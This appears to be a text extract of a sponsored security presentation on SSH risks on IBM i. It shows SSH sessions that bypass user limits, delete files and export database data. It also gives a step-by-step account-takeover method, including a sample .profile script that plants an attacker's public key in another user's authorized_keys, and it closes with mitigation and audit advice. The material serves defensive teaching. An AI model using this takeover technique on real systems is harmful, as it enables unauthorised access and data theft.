Hackingiseries.

com

Insecure Shells:

The problem with SSH

By Shalom Carmel

Hackingiseries.com

You are going to see how SSH deployment on IBM i may cause unexpected, major security risks

Hackingiseries.com

Shalom Carmel is a security expert and the author of the Hacking iSeries book. He can be contacted at shalom@hackingiseries.com

This presentation is sponsored by Raz-Lee Security, a leading security solution provider for IBM i.

Hackingiseries.com

SSH functionality

sftp, scp Secure file transfer ssh - Secure shell (like Telnet) Available on IBM i since 5.3

Hackingiseries.com

SSH is good

SSH is encrypted FTP and TELNET are not

Easy to script file transfers

SSH can be used to encrypt other cleartext protocols via tunneling De-facto standard in Unix/Linux

Hackingiseries.com

However
SSH deployment on IBM i may cause

unexpected major security risks

Hackingiseries.com

IBM i security methodology

System configuration

Limit user Special authorities

Limit user capabilities

Application Security
Exit program security System Object security
Too often not implemented well.

Hackingiseries.com

Some system configuration is irrelevant

Session Timeout Limit QSECOFR access Limit virtual devices 5250 policies irrelevant to SSH

Password policies

Password policies irrelevant to SSH if using private keys

Hackingiseries.com

A user has limited capabilities in the user profile

Hackingiseries.com

and cannot run some commands

Hackingiseries.com

No limit to user capabilities in SSH

Use the system utility to run the command that was previously blocked
Using username "shalom". shalom@s520's password: $ $ system dltf NWDB/items CPC2191: Object ITEMS in NWDB type *FILE deleted.

Hackingiseries.com

SSH disregards 5250 parms

Ignores user level initial program Ignores user level initial menu

Hackingiseries.com

No application security
Use the db2 utility to access or modify data
$ $ qsh -c 'db2 "select * from NWDB.products"' > products.txt $

Hackingiseries.com

No exit program security

Use external sftp tools to get the data out, either from IFS or from a library
psftp> open MyAS400 login as: shalom shalom@MyAS400's password: Remote working directory is /home/SHALOM psftp> psftp> get products.txt remote:/home/SHALOM/products.txt => local:products.txt psftp> psftp> get /qsys.lib/nwdb.lib/prices.file/prices.mbr remote: /qsys.lib/nwdb.lib/prices.file/prices.mbr => local:prices.mbr

Hackingiseries.com

and while were at it

Lets gather some intelligence for the next phase
psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.USRPRF Listing directory /qsys.lib ?rwx-----1 qsecofr 0 217088 ?rwx-----1 qsecofr 0 548864 ?rwx---r-x 1 qsecofr 0 389120 ?rwx-----1 qsys 0 8466432 ?rwx-----1 qsys 0 2699264 ?rwx-----1 qsys 0 110592 ?rwx-----1 qsecofr 0 1150976 ?rwx-----1 qsecofr 0 221184 ?rwx-----1 qsecofr 0 241664 ?rwx-----1 qsecofr 0 258048 ?rwx-----1 qsecofr 0 2719744 psftp>

Mar Mar Oct Oct Oct Mar Mar Mar Oct Mar Mar

13 13 17 17 17 13 13 13 17 13 13

2011 2011 14:23 16:08 14:56 2011 2011 2011 15:45 2011 2011

KOKO.USRPRF MARYLIN.USRPRF MENNY.USRPRF QDBSHR.USRPRF QDBSHRDO.USRPRF QTMPLPD.USRPRF RON.USRPRF ROSY.USRPRF SHALOM.USRPRF TAMMI.USRPRF TOBIAS.USRPRF

Hackingiseries.com

User profiles
psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.USRPRF Listing directory /qsys.lib ?rwx-----1 qsecofr 0 217088 ?rwx-----1 qsecofr 0 548864 ?rwx---r-x 1 vndprof 0 389120 ?rwx-----1 qsys 0 8466432 ?rwx-----1 qsys 0 2699264 ?rwx-----1 qsys 0 110592 ?rwx-----1 qsecofr 0 1150976 ?rwx-----1 qsecofr 0 221184 ?rwx-----1 qsecofr 0 241664 ?rwx-----1 qsecofr 0 258048 ?rwx-----1 qsecofr 0 2719744 psftp>

Mar Mar Oct Oct Oct Mar Mar Mar Oct Mar Mar

13 13 17 17 17 13 13 13 17 13 13

2011 2011 14:23 16:08 14:56 2011 2011 2011 15:45 2011 2011

KOKO.USRPRF MARYLIN.USRPRF MENNY.USRPRF QDBSHR.USRPRF QDBSHRDO.USRPRF QTMPLPD.USRPRF RON.USRPRF ROSY.USRPRF SHALOM.USRPRF TAMMI.USRPRF TOBIAS.USRPRF

Hackingiseries.com

List of libraries Possible targets to explore

psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.LIB Listing directory /qsys.lib . . . drwx-----1 qdftown 0 2719744 drwx---rwx 1 qdftown 0 7110592 drwx---rwx 1 vndprof 0 675217088 drwx---rwx 1 vndprof 0 92699264 drwx---rwx 1 vndprof 0 3466432 drwx---rwx 1 vndprof 0 4548864 drwx---rwx 1 vndprof 0 4389120 drwx-----1 quser 0 258048 drwx---rwx 1 benny 0 221184 drwx-----1 quser 0 241664 drwx-----1 qdftown 0 1150976 . . . psftp>

Mar Mar Mar Dec Dec Mar Dec Mar Mar Oct Mar

13 13 13 17 17 13 17 13 13 17 13

2011 2011 2011 14:56 16:08 2011 14:23 2011 2011 15:45 2011

AAETEST2.LIB ABCDATAD.LIB ABCDATAP.LIB ABCDATAQA.LIB ABCPGMD.LIB ABCPGMP.LIB ABCPGMQA.LIB ADTSLAB.LIB APBENNY.LIB APSHPY.LIB AU117FR.LIB

Hackingiseries.com

So far we have seen that SSH

Ignores key system values

Disregards user limited capabilities

Bypasses application security Is not controlled by exit program security But we still have object security, dont we? And we limited the numbers of *ALLOBJ users.

Hackingiseries.com

IBM i security with SSH

System configuration

Limit user Special authorities

Limit user capabilities

Application Security
Exit program security System Object security

Hackingiseries.com

IBM i security with SSH

System configuration

Limit user Special authorities

Limit user capabilities

Application Security
Exit program security System Object security

You are still at risk, because.

Hackingiseries.com

You are going to see

How to take over another users account via SSH

Hackingiseries.com

First some explanations about shells and keys

Hackingiseries.com

A shell is

a piece of software that provides an interface for users of an operating system which provides access to the services of a kernel.
Wikipedia

Hackingiseries.com

On IBM i this is a shell

The regular AS400 5250 menu system and command line
USER User Tasks System: MYAS400

Select one of the following:

1. 2. 3. 4. 5. 6. 7. 8. 9. Display or change your job Display messages Send a message Submit a job Work with your spooled output files Work with your batch jobs Display or change your library list Change your password Change your user profile

60. More user task options 90. Sign off Selection or command ===> __________________________________________________________________________ _______________________________________________________________________________ F3=Exit F4=Prompt F9=Retrieve F12=Cancel F13=Information Assistant F16=System Main menu (C) COPYRIGHT IBM CORP. 1980, 2007.

Hackingiseries.com

But so is this
The QSH command
QSH Command Entry Hello SHALOM $

===>______________________________________________________________ __________________________________________________________________ __________________________________________________________________ _____________________________________ F3=Exit F6=Print F9=Retrieve F12=Disconnect F13=Clear F17=Top F18=Bottom F21=CL command entry

Hackingiseries.com

And this
PASE AIX emulation: CALL QP2TERM
/QOpenSys/usr/bin/-sh Hello SHALOM #

===>______________________________________________________________ __________________________________________________________________ __________________________________________________________________ _____________________________________ F3=Exit F6=Print F9=Retrieve F11=Truncate/Wrap F13=Clear F17=Top F18=Bottom F21=CL command entry

Hackingiseries.com

And also SSH

SSH runs in the PASE environment, and behaves like PASE except for different keyboard control

Hackingiseries.com

Shell mix up
The AS400 command line is the primary shell Were good at limiting it, managing access and setting up defaults Very little thought given to proper setup of the other shells

Hackingiseries.com

SSH private key authentication

Enabled by default in the sshd configuration

User creates a private/public key pair

Public key placed on the server Private key can be protected by a keyphrase, creating a strong, two factor authentication Enterprise SSH key management is difficult

Hackingiseries.com

Lets get down to business

Hackingiseries.com

Take over another user via SSH

Possible due to the shell mix up on IBM i

I am going to associate my own public key with another user

The method shown is one of several possible Use your imagination to find other methods After takeover, I can login via SSH as another user, and do stuff as that user Changing the password does not help at all

Hackingiseries.com

Step 1: Find a user

Must have access to the users home directory
Simple because that is the system default

Either a user with *ALLOBJ authority Or a user who owns their home directory

Also requires a user who uses Qshell or PASE

Hackingiseries.com

*ALLOBJ considerations
If the perpetrator has *ALLOBJ authority, there are still good reasons for him to be able to masquerade as someone else
A perpetrator with *ALLOBJ can setup another user without the elaborate preparations detailed in this presentation

Hackingiseries.com

Using ssh to find a user

In a previous slide you saw how to list QSYS

Lets look for a user who has a home dir

Using username "badguy". Authenticating with public key "openssh-key" $ cd /home $ ls -l total 136 Drwxrws--2 badguy 0 8192 Jan 11 09:25 drwxrwsrwx 2 goodguy 0 8192 Jan 12 01:45 drwxrwsrwx 3 qibmhelp 0 8192 Apr 28 2008 drwxrwsrwx 3 qsecofr 0 8192 Jan 11 10:39 drwxrwsrwx 2 qsecofr 0 12288 Jan 12 01:57 drwx--S--2 user0011 0 8192 Jan 9 09:31 drwx--S--3 user0022 0 8192 Jan 9 09:31 $

BADGUY GOODGUY QIBMHELP QPGMR QSECOFR user0011 user0022

Hackingiseries.com

Step 2: Create the homedir

The user must already own an existing home directory or have *ALLOBJ authority If the user has *ALLOBJ authority but no home directory, then the following command will create the home directory for the next steps
MKDIR DIR('/home/GOODGUY') DTAAUT(*EXCLUDE) OBJAUT(*NONE)

Hackingiseries.com

Step 3: Modify the shell startup

In the home directory, create a file called .profile (with a dot) that does the following:
Creates a directory called .ssh Places my public key in file .ssh/authorized_keys

Removes all public authority from the home directory, the .ssh directory and authorized_keys
Sets ownership of the home directory to self

Hackingiseries.com

Step 3: Sample .profile script

On the echo command below, the string with the three dots until the \ at the end of the line should be replaced with your public key.

The QIBM 5799SS4 SSHD V3.51 string is just for show

if [ ! -d .ssh ] then mkdir .ssh fi chmod 700 .ssh if [ ! -f .ssh/authorized_keys ] then touch .ssh/authorized_keys setccsid 1252 .ssh/authorized_keys fi echo ssh-rsa AAAAB3Nza...7/rNy8= QIBM 5799SS4 SSHD V3.51 \ >> .ssh/authorized_keys chmod 700 .ssh/authorized_keys chmod 700 . rm .profile

Hackingiseries.com

Step 4: Wait
As previously stated, this only works with users who run interactive, non-5250 shell sessions. Typically, these are the power IT users

If you have *ALLOBJ authority, you can set up all the necessary files and permissions yourself
Or find another creative way to force a user to run some code. Read my book for ideas!

Hackingiseries.com

Private key authentication highlights

Does not care for expired passwords

Can log in even if password is *NONE

Respects the *DISABLED user status Uses special authorities and object permissions The authorized_keys file can contain multiple public keys

Hackingiseries.com

Mitigation: Prevention
Manage a white list of allowed users and IP addresses in the sshd configuration file Improve the native object security Jail (chroot) your ssh users (good luck with it) Create a secure home directory for all relevant users

Get a good security package with integrated ssh support

Hackingiseries.com

Mitigation: Audit
Have a syslog daemon running and log ssh authentication Audit the /QopenSys/etc/profile and the /etc/profile files

Audit the authorized_keys files

Get a good security package with auditing and syslog support

Hackingiseries.com

References

Jailing your AS400 users http://bit.ly/A2Jg1r

SSH in the Midrange wiki http://bit.ly/kDHUt